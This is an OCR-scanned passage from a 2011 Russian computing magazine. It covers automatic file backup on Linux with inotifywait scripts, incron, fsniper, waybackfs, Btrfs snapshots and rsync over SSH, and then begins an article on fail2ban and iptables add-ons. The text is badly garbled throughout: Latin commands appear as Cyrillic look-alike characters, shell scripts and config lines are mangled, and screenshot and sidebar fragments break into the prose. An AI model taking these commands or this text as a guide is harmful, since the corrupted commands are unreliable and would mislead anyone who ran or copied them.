Ьгтз Г11езузфет детгад <1118>1%91г> [4111е>1491г>,..] 
Ь\гР5 111е5у5%ет эзупс <ра\фН» 

ЫгР5 Г11езуфет геле [+/-]<51хе>[окт] тах < Цезузфет» 
Без Оеу1се эсап [60еу1се» [64еу1се».,]] 


БТгР5 Оемтсе эВбош <0ем? |< 1а6е1» [&0ем? |< 1а6е,.,] 


Ь№еР5 дем1се Ба]апсе храН» 


Возможностями файловой системы 61$ можно 
управлять и с помощью одноименной утилиты 


шу .$1.Бак $1 


Поместив их в файл -/.БазВгс, ты получишь команду\!г, 
которая будет бэкапить файл при каждом его открытии 
(делая его скрытым и помечая датой}, и команду ге", которая 
позволит вернуть файл из самого свежего бэкапа на место. 
Это довольно действенный способ, ия использую его для 
конфигурирования удаленных серверов, но надомашней 
машине он окажется не очень эффективным. Здесь файлы 
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Коог Тгее 


Ь5 создает иллюзию сосуществования 
нескольких файловых деревьев в рамках 
снапшотов, однако все они связаны 


ОРиестогу цет$ 


Зпарзйо! '5пар’ 
Роицег 


| ОБО Тгее | 


Е]ез$ ап 


Питесюпе$ 


могут быть далеко не текстовыми, а вкачестве редактора 


использоваться куча разных программ. Более гибкая систе- 


ма должна перехватывать любые попытки изменить файл 
науровне системы и делать бэкап автоматически. 


Доверимсяядру 


Трудно найти более подходящий инструмент для тотальной 
слежки за файлами, чем |по{\у. Работая внутри Мпих- 
ядра, эта подсистема не пропустит ни одного изменения, 
открытия или закрытия файла, а мы сможем узнать об этом 
с помощью простой консольной команды под названием 
по{(фуммак. 

|по{Кумиак (которая входит в состав пакета по{Му-{0о($] 

— примитивная утилита, она ждетуказанного события, 
связанного с определенным файлом, а затем завершается 
или пишетвлоготом, что произошло. Ее оченьудобно ис- 
пользовать в скриптах: достаточно просто добавить вызов 
команды в начало скрипта, а далее поместить код, манипу- 
лирующий файлом или каталогом. 


Для нашей задачи по ума" подходит идеально, в качестве 


события мы можем указать не просто доступ к файлу, а 
завершение операции его изменения, тем самым защи- 
тив себя от ситуаций, когда файл открывается просто «на 
посмотреть»: 


$м!-/6т/т-БаскК.$В 
Н!/61т/$И 
ОТК=` рма` 


аеГаи 
$пар 


р шо 

Во ЕгееВЗВЬ есть 
аналог подсистемы 
[|поШу под названи- 
ем Качцеце, однако 
утилит, способных 
задействовать его 
возможности, нет. 


| МАВММб_ 


› магпт9 

Ни в коем случае не 
используй Г5трег 
для наблюдения за 
{оггег{-загрузками. 
Тоггег(-клиенты 
создают файл еще 
до его фактической 
загрузки, поэтому ты 
рискуешь ввести их в 
ступор. 


[НТТР:// МММ 


р ЦпК$ 
Ч!5фапт.сА/по{аЦ/ — 


версия {ац, основан- 
ная на |поу. 
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[]1т@туро$ф “1$ 1по111уша1* -т /ргос 
бетт1пд ир шатспез. 


Натспе$ езТаб]11$Пед, 


/ргос/ 
иргос/ 
/ргос/ 
И/ргос/ 
иргос/ 
/ргос/ 
Иргос/ 
Иргос/ 
Иргос/ 
/ргос/ 
иргос/ 
/ргос/ 
иргос/ 
Иргос/ 
Иргос/ 
иргос/ 
/ргос/ 
И/ргос/ 
Иргос/ 
/ргос/ 
ов 


ОРЕМ мет1пТо 

ЯССЕ55 тет1пТто 
С-О$5Е_МОНЮТТЕ ‚, СЕ О5Е 
ОРЕМ мтет1пТо 

ЯССЕ55 тет1пТто 

С 05Е _МОНЮТТЕ ‚ СЕ 05Е 
ОРЕМ $Та+ 

ЯССЕб$5 эТтат 

С 05Е _МОНРЮТТЕ ‚ СЕ О$Е 
ОРЕМ $Та+ 

ЯССЕ55 эТат 

АЯССЕб5 Тат 

ЯССЕб5 эТтат 

СЕ О$Е_МОНЮТТЕ ‚, СЕО$Е 
ОРЕМ мтет1пТо 

ЯССЕ55 тет1птТо 

Ст О$5Е_МОНЮТТЕ ‚, СЕО5Е 
ОРЕМ мтет1пТо 

ЯССЕ55 тет1пТто 
С-05Е _МОНЮТТЕ ‚ СЕ О5Е 


[]1т@турРо$+ ^1$ № 


тет1птТо 


тет1пТо 


5тат 


5тат 


тет1пТо 


тет1пТо 


Тестируем по\Тумиай на каталоге /ргос 


ий11е 1по{1Фума1* -г -е тоа1Фу $ОТК; ао 
ср ФОТК -/БаКк/.ФОТК.Бак 


аопе; 


Этот скрипт будет делать резервную копию текущего каталога каждый 
раз, когда один из файлов внутри него будет изменен. Это самая про- 
стая реализация скрипта, которая не учитывает сообщения самого 
по(фумак и поэтому делает работу очень грязным методом, просто 
копируя весь имеющийся каталог. Более сложная реализация может 
выглядетьтак: 


Пишем скрипт для удаленного бэкапа файлов 


$м-/Ыт/Лт-Баск2.$В 
#1! /61п/$П 
ОТВ=` рма` 
1по{1Рума1{ -тг --Е1тефие '%а-%т-%у %Н-%М' \ 
- -Рогтае'%Т Ж' -е с1озе_мг1*е $ОТВ | \ 
мИ11е геаа ОБАТЕ ТТМЕ ЕТЬЕ; ао 
ср ФЕТЬЕ „ФЕТЬЕ.Бак-ФОАТЕ-$ТТМЕ 
допе 


Это своего родауниверсальная версия подхода, рассмотренного в на- 
чале статьи. С помощью флага '-пл' мы заставили 'поум/ак писать лог 
изменений файлов в стандартный вывод, с помощью опций '--Нтейте и 
'--Гоггпае мы изменили ее выводтак, чтобы в логпопадали дата, время, 
атакже имя изменяемого файла. Далее мы сделали цикл, который чита- 
етэтотлоги копирует измененные файлы, делая их скрытыми и добав- 
ляя кимени дату и время изменения. Впоследствии все сохраненные 
таким образом файлы можно будетувидеть с помощью такой команды: 


$ 1$ -Ла | вгер -е '.*\.Бак-\.*' 


Аудалить — спомощью такой: 
$ гм -г-+ *.Бак-* 


Во второй части статьи, когда мы будем говорить о способах синхро- 
низации файлов между машинами, я покажу более развитую версию 
этого скрипта, а пока рассмотрим инструменты тпсгоп и Тегирег которые 
делают работу с'поу более удобной. 


Планировщик для файлов 
ровщикдляф 

Утилита !по{ШумиаК удобна и проста в использовании, она хорошо подхо- 
дитдля тривиальных скриптов, но реализовать систему тотальной слеж- 
ки за файлами сее помощью довольно сложно. Поэтому мы воспользу- 
емся более высокоуровневым инструментом под названием тсгоп. 
Демон псгоп, как нетрудно догадаться по названию, это |поШу-версия 
стандартного сгоп. Он читает список правил, затем переходитв фони 
ждет, пока не наступит описанное в правилах событие. Когда это про- 
исходит, запускается указанное приложение/скрипт, которому могут 
быть переданытакие аргументы, как время модификации, имя файлаи 
каталога и другие. Всего ихчетыре: 


$@ - каталог/файл, за которым ведется наблюдение 
$# - имя файла, с которым связано произошедшее событие 


ПЕ ИЬТп/И$Ь 

016=` ршд` 

# Имя пользоВателя на удаленном хосте 
05ЕВ=“мазца” 

# Имя чдаленного хоста 

НО5Т=”Во$+ . сот” 

# Каталог для Бэкапа на удаленном хосте 
РЕМО1Р= '/БасКкир 


шн1]1е геад ОЯТЕ Т1МЕ ЕЕ; до 


Допе 


^/Б1тп/1п-гзупс . $0[+1 [$6] 
-- ВСТАВКЯ (Вклейбка) — 


1 по*1ТЧша!4 -тг —-Е тетю '29-2т-Ху ХН-ХМ”° --Тогпа*'ХТ ХТ’ -е с10озе_шг14е $01 1\ 


гзупс -а —-де1ефе -е з$Н ${018}/${ЕТЕ} ${05ЕРЗ@${НО5Т} : ${РЕМОТВ} 


35 Их23 [1,1116] 
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$% - флаги события (в текстовом формате) 
$& - флаги события (в числовом формате) 


Для добавления событий и правил используется сгоп-подобная утилита 
'шпсгопаб, вызов которой с флагом '-! приведет к распечатке текущего 
списка правил. Для добавления новых правил используем уже знако- 
мый по сгоп флаг '-е'. Откроется редактор, в который можно вписать пра- 
вила и закрепленные за ними команды, используя следующий шаблон: 


[путь] [действие] [команда] 


Здесь «путь» — это путь до файла/каталога, «действие» — операция, 
совершаемая над файлом, а «команда» — это команда, которая будет 
выполнена в случае возникновения действия по отношению куказанно- 
му файлу [в качестве аргументов могут быть использованы приведенные 
выше метапеременные). 

Список поддерживаемых действий полностью совпадает со списком 
действий самой подсистемы поу и команды тоумак. Вотон: 


ТМ АССЕ$З$ — Произошло обращение к файлу (например, чтение) 
ТМ АТТКТВ — Метаданные файла (такие как владелец или права 
доступа) были изменены 

ТМ СЕО$Е_МВТТЕ Е11е — Файл, открытый для записи, был успешно 
закрыт 

ТМ СЕО$Е_МОМВТТЕ Е11е — Файл, открытый не для записи, был закрыт 
ТМ СВЕАТЕ — В наблюдаемом каталоге был создан файл 

ТМ ОЕЕГЕТЕ — Файл был удален из наблюдаемого каталога 

ТМ ОЕГЕТЕ_$ЕЁЕ — Был удален сам наблюдаемый каталог 

ТМ МООТРУ — Файл был изменен 

ТМ МОМЕ_$ЕТЕ — Наблюдаемый каталог/файл был перемещен 

ТМ МОМЕБ_ЕВОМ — Файл был перемещен за границы наблюдаемого 
каталога 

ТМ МО\ЕБ_ТО — Файл был перемещен в наблюдаемый каталог 

ТМ ОРЕМ — Файл был открыт 


Для управлениятем, кто может добавлять правила, используются файлы 
/еЁс/псгоп.аЦо\мии /е{сЛпсгоп.депу, которые содержат список разре- 
шенныхи заблокированных пользователей. Поумолчанию эти файлы 
не существуют, поэтому создать новое правило отсвоего имени может 
любой пользователь. 

Демон !псгопа оченьудобен для решения нашей задачи. Он стартует 

во время старта ОС и постоянно находится в фоне, а вправильных дис- 
трибутивахеще и перезапускается после падения. Проблемы скриптов, 
отваливающихся оттерминала, его не касаются. 

Вотпростейший примертого, как можно использовать 'псгопа для сле- 
жения и бэкапа файлов каталога /ес. Запускаем редактор правил: 


$ ехрог+ ЕОТТОВ=\1т 
$ сиао сгопфаь -е 


И пишем следующую команду: 


/ефс ТМ_СЕО$Е_МВТТЕ /61п/ср $@/$# $@/ .$#.Бак-` /61п/дате +'%Е'` 


Это все, теперь после каждого редактирования конфигурационного 
файла будет создаваться его скрытая и помеченная датой модификации 
копия, почти так же, каки во всех приведенных ранее примерах. 


Каждому файлу — свое место 


Существуетеще более интересная тойу-утилита под названием Т5прег 
(Незбгпеа*пеУргоес{/Лепрег). Для решения нашей задачи она будет 
не столь полезна, ноя просто не могу обойти ее стороной. 

Программа Тгирегбыла написана с целью упорядочить и автомати- 
зироватьуправление файлами. Аналогично 'псгоп она ждет событий, 
находясь в фоне, но вместо того чтобы позволить пользователю самому 


задаватьтип событий, она умеет обрабатывать только вновь созданные 
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файлы и на основе маски их имени определять совершаемые над ними 
действия. 

Чтобы понять, зачем это нужно, представь, что утебя есть каталог, в ко- 
торый складываются все скачанные из интернета файлы (спорю, что так 
оно и есть). Время отвремени скопившуюся кучу информации приходит- 
ся разгребать, перемещая изображения в каталог -//падез, видеофай- 
лы — в-/\4ео, музыку — в-/гппиузс ит.д. Так вот, Ее п!регберет на себя всю 
эту работу, руководствуясь составленным тобой списком правил. Один 
раз написав правила, ты можешь навсегда забыть о ручном труде и на- 
слаждаться автоматической расфасовкой. 

Сами правила довольно просты в составлении и чтении, поэтому про- 
цесс написания правильного конфигурационного файла не займет 
много времени. Все, что нужно для этого сделать, это установить 
Т5пирег: 


$ зи4о ар*-ве{ 1п5%а11 Еп1рег 


Создать каталог для конфига: 


$ мКа1г -—/ . сопй/Е5птрег 


И поместить в него файл сопйд примерно следующего содержания: 


$ м1 -/ . сопЯё/Е5п1трег/сопЯ? 
мафси { 
# Наблюдаемый каталог 
—/аомп1оа4$ { 


1таёе/* { 

Папа] ег = ср %% -—^/1таве$ 
| 
\1аео/* { 

Папа] ег = ср %% -—/\у1аео 
} 
ача1о/* { 

Папа] ег = ср %% -—^/ти$1с 
} 


Эти правила описывают именноту ситуацию, о которой я говорил выше, 
разныетипы данных помещаются в разные каталоги. Обрати внимание, 
что в качестве метода классификации мы использовали ппите-тип, 
также допускается использование масок файлов (например, *.а\) или 
регулярные выражения (.*НОЕ.*). 

Теперь можно запустить 5 пфрег в режиме демона и наслаждаться 
результатом: 


$ Еп1рег --даетоп 


Единственное, что нужноучесть, это то, что в отличие от сгоп, 5 прег 
работает от обычного пользователя, а потому он должен быть запущен 
во время входа пользователя в систему или запуска графической обо- 
лочки. Пользователи бпоте и КПЕ могут воспользоваться встроенными 
конфигураторами для выполнения этой операции, для всех остальных 
есть файл инициализации -/.хзез51оп: 


$ \1 -/.х5е$$10п 
Фзп1рег --аетоп & 


Путь назад 


Итак, мы рассмотрели несколько Папа паде-способов откатить файлы 
кпредыдущим состояниям, итеперь настало время выяснить, естьли в 
[Чпих болееунифицированные и стандартизованные способы сделать 
это. Есть ли здесь файловые системы, которые из коробки предоставят 
способ делать резервные копии файлов и восстанавливать их. 

Как оказалось, такие системы есть, и их не две-три, а десяток. Одна 
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Оуегшг1Те (4Ч/п)? ч 


Епфег зате раззрйгазе ада1п: 


Тре Ккеу Т1пдегри1пт 15$: 


Тре Кеуч $ гапдотаг+ 1таде 1$: 
+-==[ 05А 19249]=-=--+ 


Оо 


| 
| 
| 
| 
| № 
| 
| 
| 
| 


а + 
[)1п@туро$+ “1$ № 


[)1т@туро${ “1$ э=Н-Кеудеп -+ 4за 
бепегат1пд руб 11с/риг1\уате 95а Кец ра!г. 
ЕпТтег 11]е 1п уй1сП То зауе ТПе Кецу (/Поме/ ]1т/.$$1/149_4$а): 
/Поме/ )1т/.5$1/149_Ч95а а1геаЧцу ех1$т$, 


Епфтег раззрИгазе (етрфу Тог по раззрИгазе); 


Уоцг 14епт1Т1сат1оп Паз Бееп зауеЯ 1п /Помте/]1т/.$$1/14_4$а. 
Усиг руб]1с Кец Паз Бееп зауед 1п /Поме/ ]1т/.$$1/19_9$а.руб. 


57:94а:33:16:ас'95':69:41:25:е7:96:12:83:21:59:499 ]1т@тупозт 


Генерируем новый 5$Н-ключ для гзупс 

изсамых удобных и интересных из них носитимя \м/аубаск [маубаск. 
зоигсеогае.пе]). Ее преимущество втом, что она работает поверх 
существующей файловой системы, а значит, не требует пересоздания 
файловой системы и каких быто ни было манипуляций с существую- 


щими файлами. Достаточно просто установить \/аубаск, используя 
пакетный менеджер: 


$ зи40 ар*-ве{ 1п5%а11 маубаск 


И смонтировать ФС к нужному каталогу с помощью команды гпочцг\. 
м/аубаск: 


$ тоип* .мауБасК /оригинальный/каталог /точка/монтирования 
Все, теперь любое изменение файла во втором каталоге приведетк 
прозрачному созданию его резервной копии, а следующее изменение 
— кпоявлению ещеодной копии. Для просмотра списка всех бэкапов 
выбранного файла можно использовать команду \$а(: 

$ мзфаф файл 
А чтобы вернуть его кодной изпредыдущих версий — команду угеуем: 

$ угеуег+ -4 12:00:00 файл 


Так файл снова станеттаким, каким он былв 12 часов. Время можно 
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указать и поточнее, например, добавить дату: 


$ угеуег+ -4 2011:01:01:0:00:00 файл 


Хотя, скорее всего, Проще будет использовать номер сохраненной вер- 
сии, который выводитописанная ранее команда у$аг: 


$ угеуег* -п 5 файл 


В конце концов, чтобы все эти резервные копии не захламляли жесткий 
диск, их можно потереть командой УЕ: 


$ угт файл 


И продолжать спокойно изменять файлы, в результате чего будут ПЛО= 
диться все новые и новые версии. Просто, нетакли? 


Назад, вбудущее 

Все рассмотренные ранее подходы используют версионность файлов 
для обеспечения возможности их отката кпрошлым версиям. Однако 
иногда снапшоты могут стать более действенным способом хранения 
оригиналов. 

Суть снапшотов состоит втом, чтобы дать пользователю возможность 
сделать снимок состояния файловой системы и позволить вернуть 
ФС к этому состоянию влюбой момент времени. Обычно механизм 
снапшотов встроен прямо в файловую систему, поэтому абсолютно 
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Вопше: 30-70% тах о\уегйеаа 


Улие рег \ММИе рег 
спагасфег ЫосЕ 


Рави е 


Рвад рег 
спагасег ЫссЕ 


Реад рег 


Производительность ФС при использовании \М/аубаск 
остается на достойном уровне 


прозрачен для пользователя и удобен в использовании. Стандартные 
файловые системы ех"3 и ех4 не поддерживают этот механизм (в по- 
следней он должен появиться в ближайшее время}, зато его поддерж- 
каесть в Б\г{$, которая хоть и считается нестабильной, но включена 

в Ипих-ядро (начиная с версии 2.6.29-гс). Поэтому если натвоей 
машине установлен достаточно свежий дистрибутив, атакже имеется 
свободный раздел для экспериментов, настоятельно рекомендую вос- 
пользоваться этой возможностью. 

Для работы с 65 нужныутилиты, распространяемые в пакете {“{- 
ргод$ (в некоторых дистрибутивах — БЕ -ргод$-ип$аБ(е}. Их нужно 
установить в первую очередь: 


$ и40 ар*-ве{ 1п5$%а11 БЕгР$-ргов$ 


Далее следует выбрать подходящий раздел, создать на нем файловую 
систему и смонтироватьее: 


$ зидо тК+$.БЕг+5 /дем/захх 
$ зиао тоип* /ае\у/$ахх /тпе 


Теперь файловую систему можно наполнить данными, а затем сделать 
снапшотс помощью следующей команды: 


$ зидо Бег $сЕ1 -5 Яг5& 5парзНое /тпЕ 


Через какое-то время можно сделать следующий снапшот: 


$ зиао БЕгР$сЕ1 -5$ зесопа_5пар$зПо* /тпе 


Количество снапшотов не ограничено, поэтому перед каждым важным 
изменением файлов можно делать все новые и новые снапшоты. Чтобы 
вернуть файловую систему ктому состоянию, в котором она находилась 
во время одного из снапшотов, необходимо просто смонтировать ее с 
опцией «зиб\уо[=имя_снапшота»: 


$ зидо иточпе /тпе 
$ зидо тоип{ -о зиб\о1=Аг$*_зпарзПо* /аем/вахх /тп* 


Но гораздо удобнее сразу монтировать файловую систему сопцией 
«5иБуо[=.», благодаря чему все снапшоты будут видны вточке монтиро- 
вания как простые каталоги: 


$ зиао иточпе /тмп* 

$ тоипЕ -о зиб\уо1=. /деу/Вахх /тпЕ 
$ 1$ -1 

Дефач1+ 


ХАКЕР 08 /151/ 2011 


пг$&_пар$По* 
5есоп_зпар$По* 


При работе со снапшотами Б\г{$ использует механизм сору-оп- 
мигКе (копирование при записи), так что дополнительное простран- 
ство будут занимать только те файлы, содержимое которых было 
реально изменено. Неизменившиеся файлы будут иметь только 
одну копию. 


Удаленная сторона 


Несмотря на все преимущества описанных ранее подходов, хранение 
резервных копий налокальной машине не самая удачная идея. Если 
жесткий диск выйдет из строя, данные и их бережно сохраненные копии 
могут быть безвозвратно потеряны. Мы должны позаботиться отом, 
чтобы данные сохранялись на каком-то удаленном хосте. 

Самый простой и эффективный способ сделать удаленное резервное 
копирование — это воспользоваться инструментом под названием 
гзупс. Эта система синхронизации/копирования файлов может быть 
использована как для локального бэкапа файлов, так и для их пере- 
дачи наудаленную сторону. При этом синхронизируемые файлы могут 
иметь инкрементальные бэкапы, а это значит, что при многократном 
бэкапе одних и тех же данных будут сохранены только их измененные 
части, а не весь файл целиком, как это происходит при использова- 
нии скриптов, описанных в первой части статьи. 

Инструмент гэупс может быть использован как для организации об- 
ратной системы бэкапа, когда сервер собирает файлы с нужных сетевых 
машини сохраняетих на своем жестком диске, таки для прямого бэкапа 
наудаленную сторону. В рамках этой статьи мы рассмотрим только 
второй метод. 

Самый простой способ использовать гэупс — это доверить ему копиро- 
вание файлов наудаленную машину по протоколу 5$Н. Устанавливаем и 
запускаем программу: 


$ зи40 ар*-ве{ 1п5%а11 г5упс 
$ гжупс -а --ае1ефе -е $$5И /путь/до/каталога \ 
юзер@хост: /путь/до/каталога 


Чтобы команда не запрашивала пароль, необходимо настроить аутен- 
тификацию на базе публичного ключа. Для настройки немедленного 
бэкапа наудаленную машину сделаем модифицированную версию уже 
рассмотренного ранее скрипта: 


$\!-/Ып/т-гупс.$П 
#1! /Б1п/ И 
ОТВ=` рма` 
# Имя пользователя на удаленном хосте и каталог для бэкапа 
(5ЕВ="\уазуа" 
НО$Т="Ро$+ . сот" 
ВЕМОТЕОТВ=" /БасКир" 
1по{1Рума1{ -тг --Е1тефше '%9-%т-%у %Н-М" \ 
- -Рогта* '%Т Ж' -е с1озе_мг1*е $ОТВ | \ 
имп11е геаа БАТЕ ТТМЕ ЕТЬЕ; ао 
г5упс -а --ае1ефе -е х51 ${О0ТВ}/${ЕТЬЕ} \ 
${05ЕВ }@${НО$Т} : ${ВЕМОТЕОТВ} 
допе 


Теперь после каждого изменения файлы будут бэкапиться наудаленную 
машину. Было бы хорошо добавить к этой схеме еще и хранение версий 
файлов, но эта задача довольно просто решается с помощью инструмен- 
та гэпарзВо\{, обзор которого выходит за рамки данной статьи. 


ВЫВОДЫ 


Вернуть файлы из небытия можно множеством разных способов, 
сегодня мы рассмотрели только часть из них. Какой способ исполь- 
зовать — решатьтебе, главное помнить, что без резервных копий не 
обойтись. == 


› 097 


97 


№ Ш Сергей «дгтаег» Яремчук [9гптдег@{их. т.ча] 


ОГНЕННЫЙ 


ЩИТ 


Изучаем популярные надстройки для |рфащ(е$ 


® Простая фильтрация пакетов по портам и |Р-адресам уже давно 
никому не интересна, да и эффективной ее не назовешь. Продвину- 
тые межсетевые экраны умеют обрабатывать протоколы верхнего 
уровня, принимая решение на основе содержимого, а списки [Р ге- 
нерируются динамически. Все это умеет и р{аЩе$, нужно лишь его 


немного докрутить. 


СПОМ 


Не секрет, что стоиттолько засветиться в Сети новому сервису, как сразу 
кнему потянутся нити брутфорсеров, пытающихся подобратьучетные 
данные. Остановить злоумышленников можно разными способами, один 
изних — утилита Ра{2Бап (а(2Бап.ога). Идея проста: демон, сканируя 
логи, проверяет наличие записей о неудачных попытках ввода пароля 
или попытке входа в запрещенную область сети. Если таковые будут най- 
дены, то подозрительный |Р блокируется средствами рае ЛруА или 
ТСР\\гаррег /ес/по<{.аЦом/депу). Со временем бан может сниматься 


Блокируем злоумышленников 
ЕЮТаЕ бап 


автоматически, безвмешательства юниксоида, что оченьудобно, ведь 
под раздачу может попасть и легитимный хост. О блокировке пользо- 
ватель/админ получает сообщение пое-тац. Изначально Еа{2бап 
разрабатывался для защиты $$ЪН, сегодня это уже фреймворк, который 
можно легко настроить под любые приложения и события, втом числеи 
прописать свои методы блокировки [Р. Удобнотакже, что один процесс 
может защищать сразу несколько сервисов. 

На странице закачки Га(2?Бап предлагаются собственные сборки 
пакетов для большинства дистрибутивов Ипих, но дляустановки лучше 
выбрать вариант из репозитория. Мэйнтейнеры учитывают особенности 
конкретного дистра плюс добавляютотсебя файлы запуска и правила 
блокировки. 

В УБипи/ОеЫапустановка очень проста: 


$ зидо ар*-ве{ 1п5+а11 а112Бап 


Демон стартует сустановками по умолчанию, защищая только 5$Н. Все 
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настройки производятся в нескольких файлах, размещенных в каталоге 
/ес/ЛаЦ2Бап (для Сеап/УБип). В а{2бап.соп хранятся параметры 
запуска демона, внутри ничего интересного в плане настроек для нас 
нет. Начиная с версии 0.7, фильтры и действия прописываются в разных 
файлах. Послеустановки их можно найти соответственно в подкаталогах 
АЦег и асНоп.4. Файлы внутри этих директорий могут иметь расширения 
‚сопЁи [оса(. Параметры из второго замещаютустановки из первого, то 
есть чтобы что-то переопределить, вносить изменения непосредственно 
в.сопЁне нужно. Таким образом облегчается последующее обновление 

и возвратк дефолтным настройкам. Правила поиска довольно просты. 
Предусмотрено использование переменных, причем имеются уже встро- 
енные. Гак, НОЗТ соответствует регулярному выражению, используемому 
для поиска |Р или имениузла: 


(2; [а 6}: С Р<ВоЕ [м -.^ т) 
Вот, например, правило для поиска попыток ОООЗ-атаки на ЗН: 


$ егер -у '^#' /ефс/Ра1126ап/Я1%ег.4/$$Па-940$ . соп+ 
[реби11оп] 

{фа11гезех = х5Па(?:\[\9+\])?: 01а по гесе1уе 14еп1Яса*1оп 
$г1п8 Ргот «НО$Т>$ 

1епогегерех = 


Строка{аЦгедех описывает, что искать. В 1дпогегедех — значения, кото- 


рые должны игнорироваться. В одном файле можетбыть несколькотаких 
строк. Кто хоть немного разбирается в регулярных выражениях, легко 
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Тернений 


Я5лк Прыша Вад Песь [ирыеныи Баладам Гпозваа 
ирина 


отегоат > $ Та Ват - гофек РуагУТолаить. Тс ‘алиеат све ром Га Тыго; Побьае 5 

Ааа ван уф. СРув РерЕ ГОРЫ 5 РАороееНО ОТ Трире. ® |" 
изгизвагог Га 2 Бал зегмеги баг. ру: 62: боргесое оао пО- Ре 645 воде 15 Заргесв а; цве Пав 
НБ 1патева 

ШарогЕ вы 


Рипа па 38 


Обо горок Тупо : або саеТол Таго: Тобтыыво А А ба... 
Це 0 ТИ 1 магу Торищити. 109 


Дацы\ я 
веажЕеа 


Рац гедех 

|= Реды\аг ехргезз опт 

| [11| ви бса Вог. ба СТыгер окраина, Ц ОаА 5 наф * ЕКузь{ Рух герь гшрега\ 5+ Гполубе-с ВОТ 
утеущьшреги . * |715 


1 
^= Мивьег от ватейены: 
ГИ @ вар] 


Топегетерех 
|- Юесцфаг екргеванойа- 


`. Мивьег ог ватевеЕ: 


ива у 


Зоггу; по ватсм 


Тестируем правило для та!2Бап 


создаст свое правило, используя имеющиеся примеры. Для 
разбора лог-файла демон вызываетутилиту{а 2Бап-гедех, 
которую обычно применяюти для проверки нового фильтра. 
Например, в поставке нет правила для АЖеп$К или другого 
подобного сервера, но сегодня атаки на УР не редки, ив 
логах можноувидеть записи вроде: 


МОТТСЕ[ 3309] спап_$1р.с: Кеё1$%га1опт гот 
'51р:ХХХ@1.2.3.4' Ра11еа Фог '9.8.7.6' — № маесИ1 пя 
реег Фоипа 


Правило будет следующее: 


фа11]герех = МОТТСЕ.* .*;: Вер15{гае1оп Фгот '.*' 
фа11еа Рог '' — № тафсИ1пя реег Фоипа 


И так для каждого случая. Проверяем: 


$ Га112Бап-гевех /уаг/10=/аег1$К.1ов 'МОТТСЕ.* .*: 


Ве21 ${га®1оп гот '.*' Фа11еа Рог '' — № маесИ1 пя 
реег фоипа" 


Если все нормально, записываем фильтры в новый файл 
а$ег5К.сопт, взяв за пример любой из каталога НЦег.. 

С тем, что искать, разобрались. Осталосьуказать, где искать, 
и что делать с находкой. Описания всех действий собраны 

в подкаталоге асЧоп.4. Здесь несколько файлов под каждое 


Технология ОР! 


Оеер Раске{ пзресйоп [глубокое инспектирование 
пакета) — технология, позволяющая 

проверять пересылаемые данные, а не только 
протоколосодержащую информацию. ОР!-устройства 
способны работать со второго по седьмой уровни ОЗ и 
выявляют: 


® типы передаваемых данных (Р?Р, УоР, опИпе-игры, 
почта, видео], позволяя контролировать и блокировать 
трафик согласно установленной политике; 

® использование в сети наиболее распространенных 
приложений (например, для Р2Р: ВиТоггеп\, Ка/аа, 
еПопкеу бпщеЦа, МР2Р, ЕазЙгасК}; 

® загрузку сети тем или иным сервисом, формируя 

на основе анализа механизмы, гарантирующие 
определенную производительность сети (9 05}; 

® злонамеренный трафик в сети (эксплоиты, черви, 
трояны и прочие зловреды). 
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№ Терыная и 


. Терминал 
Файл Правка ВмА Поиск Терминал Справка 


# Орт1отп: Тод1еуе\ 

# Мофез.: бет чпе 109 1еуе\ ошрих. 

# 1 = ЕВАОВ 

2 2 = МАКМ 

# 3 = 14ЕО 

2 4 = ОЕВИб 

# Уа1иез; ММ бета“: 3 

8 

Т1о91еуе1 = 3 

# Ор{10п: Тодтагоет 

# Мофез.: 5е1{ Ме 109 Тагдеф. Т№1$ соц19 Бе а Те, $\$106, $ТОЕАЯ ог $ТООЦТ, 
8 ОпТу опе 109 Тагдет сап Бе $рес111е3д. 

# Уа1иез: $ТООШТ $ТОЕАК $\5106 11е Оеташ{: /маг/Лод/Та 2Бап.109 
# 


Тодтагде{ = /уаг/109/Та112Ьап. 109 


# Ор\10п: зоскет 


# №отез.: бе{ф {Не зосКкеф 111е. ТР1$ 1$ и5ед Фо сотаип1сафе и{{Н {Ве даетоп, бо 


8 по{ гетоуе 411$ Те мпеп Ра Ц2Ьап гуп$. Ц м1 11 пот Бе ро551Ще то 
8 соттип1сафе м14Н 1Ве зегуег а!Тегмага$. 
# Уа1иез: ЕЦЕ Ое!ац\{: /уаг/гип/та 2Бап/Та1125ап. 50сК 


# 
5осКке{ = /уаг/гип/Та112Бап/1а112Бап. $оск 


изегпизег - $ саф /етс/Та 12Бап/ 
ас{101.0/ 12112Бап.соп!. 111{ег.д/ 
узегпизег- $ саф /етс/Та112Бап/11\1ег.д/ 
араспе-аитп. сопт? соиг1ег5мтр . соп?т 
араспе-Бадьот$ . соп! суги$ - тар. соп! 
араспе-попоте . соп?т ех1 м. соп?т 
араспе-позсг1 рт. соп? 9$$11рд.соп! 


1а11.соп! 


рир-иг\ -Тореп.соп1 
ро5111х.сопт 
рго1{р9 . соп? 
риге-11рад.сопт 


араспе-оуег{10м5.соп!Г 11911{рд-№а$1с91.соп{! дта11.сопт 
соттоп . соп? патед - гефи5е9д . соп? 5а5\.соп! 
соиг1ег1 0911. соп! рат-депег1с.соп! 5$1еме.соп! _ 


изегисег - $ саф /езс/тТа112Бап/т11{ег, 9/9. 


55109. соПТ 
5516-6605. с0п1 
\51{р9.соп?т 
мебт1п -аи11. соп? 
\и1Трд , сопт 
х1пе{9-Та11 . соп? 


$ мель 8) [8 терминал | 


2% 25 ОША 4ф 9т024.05.1251 + ФИ 


В поставке {ай2Бап уже имеются фильтры для защиты 


некоторых приложений 


приложение/задачу, как правило, там уже все настроено, 

и менять ничего нетребуется. Но чтобы новые фильтры 
увидел Еа|2Бап, необходимо объявить их в /е{с/ба{2Бап/ 
1аЦ.сопт. Внутри этого конфига находим несколько секций с 
описанием разных сервисов. 


$ зидо папо /ефс/Ба112Бап/За11 .соп+ 

[РЕРАИЕТ] 

// ТР-адреса, которые не будут блокироваться, здесь 
можно указать подсеть или О№-имя 

12поге1р = 127.0.0.1 

// Время блокировки узла, при отрицательном значении 
блокировка постоянная 

БапЕ1те = 600 

// Промежуток времени и количество неудачных 
попыток, необходимых для блокировки 

тахгефгу = 3 

биа%1те = 600 


[а5ег15К-1рфаб1е$ | 

епаб1еа = гие 

# В Я1Тег и асЕ1оп прописываем имя файла без 
расширения из соответствующих подкаталогов плюс 
дополнительные параметры 

П]{ег = аз{ег1$К 

асЕ1оп = 1рфаб1ез-а11рог{$ [ пате=АЗТЕВТФК, 
ргофосо1=а11] 
зепата11-мИо1$ [ пате=АЗТЕКТ$К, аез*=гоо*, 
зепаег=Фа112Бап@ехатр1е.ог5] 

